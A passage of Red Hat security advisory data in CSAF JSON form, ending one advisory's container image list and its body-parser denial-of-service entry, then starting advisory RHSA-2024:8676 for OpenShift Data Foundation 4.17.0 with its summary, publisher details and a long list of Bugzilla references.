"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024_8676
Vulnerability from csaf_redhat
Published
2024-10-30 14:25
Modified
2024-12-18 04:38
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8676", url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2059669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059669", }, { category: "external", summary: "2190161", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2190161", }, { category: "external", summary: "2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "2241329", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2241329", }, { category: "external", summary: "2245068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2245068", }, { category: "external", summary: "2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "2253013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2253013", }, { category: "external", summary: "2257271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2257271", }, { category: "external", summary: "2259668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259668", }, { category: "external", summary: "2262777", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2262777", }, { category: "external", summary: "2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "2271773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2271773", }, { category: "external", summary: "2272597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272597", }, { category: "external", summary: "2275225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275225", }, { category: "external", summary: "2275965", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275965", }, { category: "external", summary: "2276393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276393", }, { category: "external", summary: "2276672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276672", }, { category: "external", summary: "2279751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279751", }, { category: "external", summary: "2279876", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279876", }, { category: "external", summary: "2280308", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280308", }, { category: "external", summary: "2280608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280608", }, { category: "external", summary: "2280637", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280637", }, { category: "external", summary: "2283994", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283994", }, { category: "external", summary: "2292435", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292435", }, { category: "external", summary: "2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "2294234", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2294234", }, { category: "external", summary: "2294723", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2294723", }, { category: "external", summary: "2297265", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297265", }, { category: "external", summary: "2297295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297295", }, { category: "external", summary: "2297447", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297447", }, { category: "external", summary: "2297454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297454", }, { category: "external", summary: "2299630", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299630", }, { category: "external", summary: "2299639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299639", }, { category: "external", summary: "2300021", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300021", }, { category: "external", summary: "2300312", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300312", }, { category: "external", summary: "2300331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300331", }, { category: "external", summary: "2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "2301889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301889", }, { category: "external", summary: "2302201", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302201", }, { category: "external", summary: "2302257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302257", }, { category: "external", summary: "2302448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302448", }, { category: "external", summary: "2302507", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302507", }, { category: "external", summary: "2302575", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302575", }, { category: "external", summary: "2302774", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302774", }, { category: "external", summary: "2302841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302841", }, { category: "external", summary: "2302842", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302842", }, { category: "external", summary: "2303028", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303028", }, { category: "external", summary: "2303342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303342", }, { category: "external", summary: "2303403", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303403", }, { category: "external", summary: "2303619", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303619", }, { category: "external", summary: "2303820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303820", }, { category: "external", summary: "2303821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303821", }, { category: "external", summary: "2303822", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303822", }, { category: "external", summary: "2303823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303823", }, { category: "external", summary: "2303824", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303824", }, { category: "external", summary: "2303825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303825", }, { category: "external", summary: "2303829", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303829", }, { category: "external", summary: "2304073", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304073", }, { category: "external", summary: "2304231", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304231", }, { category: "external", summary: "2304232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304232", }, { category: "external", summary: "2304235", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304235", }, { category: "external", summary: "2304238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304238", }, { category: "external", summary: "2304799", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304799", }, { category: "external", summary: "2304810", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304810", }, { category: "external", summary: "2304815", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304815", }, { category: "external", summary: "2304993", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304993", }, { category: "external", summary: "2305274", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305274", }, { category: "external", summary: "2305295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305295", }, { category: "external", summary: "2305660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305660", }, { category: "external", summary: "2305880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305880", }, { category: "external", summary: "2306026", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306026", }, { category: "external", summary: "2306387", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306387", }, { category: "external", summary: "2306577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306577", }, { category: "external", summary: "2307823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307823", }, { category: "external", summary: "2307835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307835", }, { category: "external", summary: "2307909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307909", }, { category: "external", summary: "2308091", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308091", }, { category: "external", summary: "2308101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308101", }, { category: "external", summary: "2308144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308144", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2308304", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308304", }, { category: "external", summary: "2308442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308442", }, { category: "external", summary: "2308446", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308446", }, { category: "external", summary: "2309191", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309191", }, { category: "external", summary: "2309195", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309195", }, { category: "external", summary: "2309485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309485", }, { category: "external", summary: "2309486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309486", }, { category: "external", summary: "2309487", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309487", }, { category: "external", summary: "2309488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309488", }, { category: "external", summary: "2309489", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309489", }, { category: "external", summary: "2309700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309700", }, { category: "external", summary: "2310369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310369", }, { category: "external", summary: "2310385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310385", }, { category: "external", summary: "2310841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310841", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311042", }, { category: "external", summary: "2311043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311043", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2311468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311468", }, { category: "external", summary: "2311551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311551", }, { category: "external", summary: "2311790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311790", }, { category: "external", summary: "2311867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311867", }, { category: "external", summary: "2311885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311885", }, { category: "external", summary: "2311893", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311893", }, { category: "external", summary: "2312137", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312137", }, { category: "external", summary: "2312442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312442", }, { category: "external", summary: "2313178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313178", }, { category: "external", summary: "2313203", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313203", }, { category: "external", summary: "2313515", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313515", }, { category: "external", summary: "2313717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313717", }, { category: "external", summary: "2313736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313736", }, { category: "external", summary: "2314200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314200", }, { category: "external", summary: "2314211", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314211", }, { category: "external", summary: "2314404", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314404", }, { category: "external", summary: "2314454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314454", }, { category: "external", summary: "2314636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314636", }, { category: "external", summary: "2315624", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315624", }, { category: "external", summary: "2315651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315651", }, { category: "external", summary: "2315666", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315666", }, { category: "external", summary: "2315709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315709", }, { category: "external", summary: "2315733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315733", }, { category: "external", summary: "2315846", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315846", }, { category: "external", summary: "2318490", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2318490", }, { category: "external", summary: "2319102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319102", }, { category: "external", summary: "2319238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319238", }, { category: 